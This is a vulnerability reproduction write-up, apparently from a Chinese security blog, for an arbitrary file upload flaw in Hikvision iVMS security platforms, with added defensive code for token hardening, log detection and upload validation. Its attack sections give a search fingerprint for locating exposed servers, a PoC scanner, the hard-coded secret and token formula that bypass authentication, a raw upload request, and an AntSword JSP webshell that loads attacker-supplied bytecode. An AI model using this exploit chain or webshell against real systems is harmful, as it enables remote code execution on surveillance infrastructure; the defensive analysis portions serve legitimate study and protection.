Hikvision iVMS integrated security system arbitrary file upload vulnerability reappears

Statement:
This article is only for technical exchange. Please do not use it for illegal purposes.
The user alone is responsible for any direct or indirect consequences and losses caused by disseminating or using the information provided in this article; the author of the article bears no responsibility for them.

1. Overview

Product description

The Hikvision iVMS centralized monitoring application management platform is oriented towards security business applications and built on video image applications. It integrates multiple security application systems such as video surveillance, networked alarms, intelligent analysis, and operation and maintenance management to form a comprehensive multi-business application management platform.

2. Vulnerability description

The Hikvision iVMS system has a 0day vulnerability that is being exploited in the wild. An attacker who obtains the key can construct a valid token at will, call the /resourceOperations/upload interface to upload arbitrary files, and thereby obtain webshell access on the server and execute malicious code remotely.

3. Affected scope

Hikvision integrated security system iVMS-5000

Hikvision integrated security system iVMS-8700

Hunter (鹰图) search fingerprint

web.body="/views/home/file/installPackage.rar"

4. PoC script

PoC written by a senior researcher; download address below (I ran the PoC many times to detect the vulnerability, but I could not reproduce it manually).

Detection script PoC: https://github.com/sccmdaveli/hikvision-poc

If you cannot access GitHub, you can copy the source code below.

import requests
import urllib3
import urllib.parse  # the original imported only "urllib", which does not expose urllib.parse.quote
import hashlib
import argparse
from colorama import init
from colorama import Fore
init(autoreset=True)
urllib3.disable_warnings()


head = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
    "Cookie": "ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169"
}


def md5encode(url):
    # token = upper-case MD5 of (request URL + hard-coded secret "secretKeyIbuilding")
    if url.endswith("/"):
        path = "eps/api/resourceOperations/uploadsecretKeyIbuilding"
    else:
        path = "/eps/api/resourceOperations/uploadsecretKeyIbuilding"
    encodetext = url + path
    input_name = hashlib.md5()
    input_name.update(encodetext.encode("utf-8"))
    return (input_name.hexdigest()).upper()


def poc(url):
    # A 200 response to the token-bearing POST means the token check was passed
    if url.endswith("/"):
        path = "eps/api/resourceOperations/upload?token="
    else:
        path = "/eps/api/resourceOperations/upload?token="
    pocurl = url + path + md5encode(url)
    data = {
        "service": urllib.parse.quote(url + "/home/index.action")
    }
    try:
        response = requests.post(url=pocurl, headers=head, data=data, verify=False, timeout=3)
        if response.status_code == 200:
            print(Fore.GREEN + f"[+]{url}存在海康威视iVMS 综合安防任意文件上传漏洞!!!!")
        else:
            print(Fore.RED + f"[-]{url}不存在海康威视iVMS 综合安防任意文件上传漏洞")
    except requests.RequestException:
        pass  # unreachable host or timeout: report nothing


if __name__ == '__main__':
    parser = argparse.ArgumentParser(usage='python3 ivms.py -u http://xxxx\npython3 ivms.py -f file.txt',
                                     description='ivms漏洞检测poc',
                                     )
    p = parser.add_argument_group('ivms 的参数')
    p.add_argument("-u", "--url", type=str, help="测试单条url")
    p.add_argument("-f", "--file", type=str, help="测试多个url文件")
    args = parser.parse_args()
    if args.url:
        poc(args.url)
    if args.file:
        with open(args.file, "r") as fh:
            for i in fh.read().split("\n"):
                if i.strip():  # skip blank lines, which would otherwise produce a bogus request
                    poc(i.strip())

Usage:

Single url detection: python3 ivms-poc.py -u url

Multiple url detection: python3 ivms-poc.py -f file.txt

5. Reproducing the vulnerability

Vulnerable URL: /eps/api/resourceOperations/upload

Note that the parameters are sent by POST.

Capture the homepage request in Burp Suite and try to access the interface: the token needs to be authenticated, and the response contains the field "token empty!".

Construct a token to bypass authentication (internal mechanism: if the token value equals the MD5 of the request URL + secretKey, the authentication check passes).

The secretKey is hard-coded in the code (default value: secretKeyIbuilding).

The token value is the MD5 hash of that string, as 32-character uppercase hex.

Combination: token=MD5(url+"secretKeyIbuilding")

Re-verify

Bypass successful; construct the file upload payload.
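To make the weakness in this token scheme concrete, the following Python is an added example (not code from the article or from Hikvision). The first function is the check the article describes: the token depends only on the request URL and a secret that ships inside the application, so it is a constant per URL, identical for every client, and never expires; swapping MD5 for a stronger hash would change nothing. The second pair is an assumed hardened design for comparison: an HMAC keyed with a per-deployment secret, bound to the authenticated session and the exact API path, carrying an expiry and a nonce, and compared in constant time. The secret, session id and lifetime values are placeholders.

```python
import hashlib
import hmac
import secrets
import time
from typing import Optional

# Hard-coded default secret named in the article. Because it ships inside the
# application, every deployment shares it and anyone who reads the code knows it.
LEGACY_SECRET = "secretKeyIbuilding"
TOKEN_TTL_SECONDS = 300  # assumed lifetime for the hardened token


def legacy_token(request_url: str) -> str:
    """The scheme the article describes: MD5(url + secret) as upper-case hex.
    Nothing here depends on who is calling or when, so it is a constant per URL."""
    return hashlib.md5((request_url + LEGACY_SECRET).encode("utf-8")).hexdigest().upper()


def legacy_verify(request_url: str, token: str) -> bool:
    """Server-side check as described: a plain string comparison against the constant."""
    return token == legacy_token(request_url)


def issue_token(server_secret: bytes, session_id: str, path: str,
                now: Optional[int] = None) -> str:
    """Hardened replacement (assumed design): HMAC-SHA256 over the session id, the
    exact API path, an expiry and a random nonce, keyed with a per-deployment secret
    that is never embedded in shipped code."""
    expires = (int(time.time()) if now is None else now) + TOKEN_TTL_SECONDS
    nonce = secrets.token_hex(8)
    msg = f"{session_id}|{path}|{expires}|{nonce}".encode("utf-8")
    mac = hmac.new(server_secret, msg, hashlib.sha256).hexdigest()
    return f"{expires}.{nonce}.{mac}"


def verify_token(server_secret: bytes, session_id: str, path: str, token: str,
                 now: Optional[int] = None) -> bool:
    """Recompute the MAC for THIS session and THIS path, reject expired tokens,
    and compare in constant time so timing does not leak the expected value."""
    try:
        expires_s, nonce, mac = token.split(".")
        expires = int(expires_s)
    except ValueError:
        return False
    current = int(time.time()) if now is None else now
    if current >= expires:
        return False
    msg = f"{session_id}|{path}|{expires}|{nonce}".encode("utf-8")
    expected = hmac.new(server_secret, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)
```

With the hardened version a token captured from one session is useless to another session, cannot be replayed against a different endpoint, and dies after the TTL; none of those properties can be retrofitted onto MD5(url + secret) without changing what the hash covers.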

POST /eps/api/resourceOperations/upload?token=<constructed token value> HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo
Upgrade-Insecure-Requests: 1
Content-Length: 174
 
------WebKitFormBoundaryGEJwiloiPo
Content-Disposition: form-data; name="fileUploader";filename="1.jsp"
Content-Type: image/jpeg
 
test
------WebKitFormBoundaryGEJwiloiPo

The response shows that the upload succeeded and returns a resourceUuid value.

Verification path: http://url/eps/upload/<resourceUuid value>.jsp
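For defenders, the request pattern described in this section leaves a recognisable trace in web server logs: a POST to the upload endpoint carrying a 32-character upper-case hex token, followed by a fetch of a .jsp from /eps/upload/. The Python below is an added example (not from the article or the vendor) that parses Combined Log Format lines and flags that sequence; the log lines, IP addresses and the resourceUuid-style file name are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Combined Log Format); not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Sep/2023:10:00:01 +0800] "GET /home/index.action HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Sep/2023:10:00:03 +0800] "POST /eps/api/resourceOperations/upload?token=0123456789ABCDEF0123456789ABCDEF HTTP/1.1" 200 210 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Sep/2023:10:00:09 +0800] "GET /eps/upload/e6f1c2d3-placeholder-uuid.jsp HTTP/1.1" 200 17 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Sep/2023:10:01:00 +0800] "GET /eps/api/resourceOperations/upload HTTP/1.1" 200 60 "-" "curl/8.0"
192.0.2.9 - - [20/Sep/2023:10:02:00 +0800] "POST /eps/api/resourceOperations/upload?token=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF HTTP/1.1" 200 210 "-" "python-requests/2.31"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
UPLOAD_PATH = "/eps/api/resourceOperations/upload"
UPLOAD_DIR_RE = re.compile(r"^/eps/upload/[^/]+\.jspx?$", re.IGNORECASE)
MD5_UPPER_RE = re.compile(r"^[0-9A-F]{32}$")  # shape of the token the article describes


def parse_line(line: str):
    """Split one log line into ip, timestamp, method, path, query dict and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    rec["status"] = int(rec["status"])
    return rec


def analyse(log_text: str):
    """Return (severity, ip, reason) findings. A JSP served from the upload
    directory is critical on its own; it is reported with the upload context."""
    findings = []
    uploads_by_ip = defaultdict(int)  # successful token-bearing uploads seen per IP
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if rec["path"] == UPLOAD_PATH:
            token = rec["query"].get("token", [None])[0]
            if rec["method"] == "POST" and token and MD5_UPPER_RE.match(token):
                severity = "high" if rec["status"] == 200 else "medium"
                findings.append((severity, rec["ip"], "token-bearing POST to upload endpoint"))
                if rec["status"] == 200:
                    uploads_by_ip[rec["ip"]] += 1
            else:
                findings.append(("low", rec["ip"], "probe of upload endpoint"))
        elif UPLOAD_DIR_RE.match(rec["path"]):
            context = ("after successful upload from same IP"
                       if uploads_by_ip[rec["ip"]] else "no prior upload seen")
            findings.append(("critical", rec["ip"], f"JSP fetched from upload directory ({context})"))
    return findings


if __name__ == "__main__":
    for severity, ip, reason in analyse(SAMPLE_LOG):
        print(f"{severity:8} {ip:15} {reason}")
```

Real deployments may place the endpoint behind a reverse proxy or a different context root, so the path constants should be adjusted to the logged form; the JSP-in-upload-directory rule is the one worth alerting on regardless, since nothing legitimate should execute from a user upload directory.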

6. Exploitation

Upload the AntSword JSP webshell directly.

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

Upload succeeded; try to connect.

7. Remediation suggestions

Remove the system's exposure to the Internet (restrict access to it), and enforce strong authentication and authorization in the file upload module.

Original article by the PoC author: https://blog.csdn.net/qq_41904294/article/details/130807691
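Beyond authenticating the caller, the upload module itself should never accept the request shown in section 5 (a file named 1.jsp declared as image/jpeg with arbitrary content). The Python below is an added example of such handling, not the product's code: the declared Content-Type is ignored, only the last extension counts, the content must start with the magic bytes of the allowed type, and the file is stored under a server-generated name so the client's file name cannot influence the path. The allowed-type table, size limit and sample bytes are assumptions for the example.

```python
import tempfile
import uuid
from pathlib import Path

# Allow-list of extensions the endpoint is meant to accept, each with the magic
# bytes its content must start with (assumed set; adjust to the real business need).
ALLOWED_TYPES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".rar": (b"Rar!\x1a\x07",),
}
MAX_UPLOAD_BYTES = 10 * 1024 * 1024  # assumed limit

# Constructed sample content: a JPEG SOI marker followed by padding.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 28


class UploadRejected(ValueError):
    """Raised when an upload fails validation; the message is safe to log."""


def validate_upload(filename: str, content: bytes) -> str:
    """Return the accepted extension or raise. The declared Content-Type header is
    deliberately not consulted: the request in the article labels a .jsp as image/jpeg."""
    if len(content) > MAX_UPLOAD_BYTES:
        raise UploadRejected("file too large")
    suffix = Path(filename).suffix.lower()  # only the LAST suffix counts: "x.jpg.jsp" -> ".jsp"
    if suffix not in ALLOWED_TYPES:
        raise UploadRejected(f"extension not allowed: {suffix or '(none)'}")
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[suffix]):
        raise UploadRejected("content does not match declared extension")
    return suffix


def store_upload(storage_root: str, filename: str, content: bytes) -> str:
    """Write the file under a server-generated name. The client-supplied name
    contributes nothing but the validated extension, so ".." segments are moot.
    storage_root should be a directory the servlet container does not serve."""
    suffix = validate_upload(filename, content)
    stored_name = uuid.uuid4().hex + suffix
    dest = Path(storage_root) / stored_name
    with open(dest, "xb") as fh:  # "x": fail rather than overwrite an existing file
        fh.write(content)
    return stored_name


def demo() -> dict:
    """Run the validator over the article's upload body and a few variants."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        name = store_upload(root, "photo.jpg", JPEG_SAMPLE)
        results["jpeg_stored_name"] = name
        results["jpeg_roundtrip"] = (Path(root) / name).read_bytes() == JPEG_SAMPLE
        cases = {
            "jsp_named_jpeg_typed": ("1.jsp", b"test"),      # the request shown in the article
            "jsp_body_jpg_name": ("1.jpg", b"<%= 1 + 1 %>"),  # right name, wrong content
            "double_extension": ("1.jpg.jsp", JPEG_SAMPLE),
            "traversal_name": ("../../1.jpg", JPEG_SAMPLE),   # name is discarded, content is fine
        }
        for label, (fname, body) in cases.items():
            try:
                results[label] = "accepted:" + store_upload(root, fname, body)
            except UploadRejected as exc:
                results[label] = "rejected:" + str(exc)
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label:22} {outcome}")
```

Storing uploads outside the web root (or serving them only through a handler that sets a non-executable content type) is what makes the stored file harmless even if a check above is bypassed; the extension and magic-byte checks reduce the attack surface, the storage location removes the code-execution outcome.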

Source: https://blog.csdn.net/qq_56698744/article/details/132964883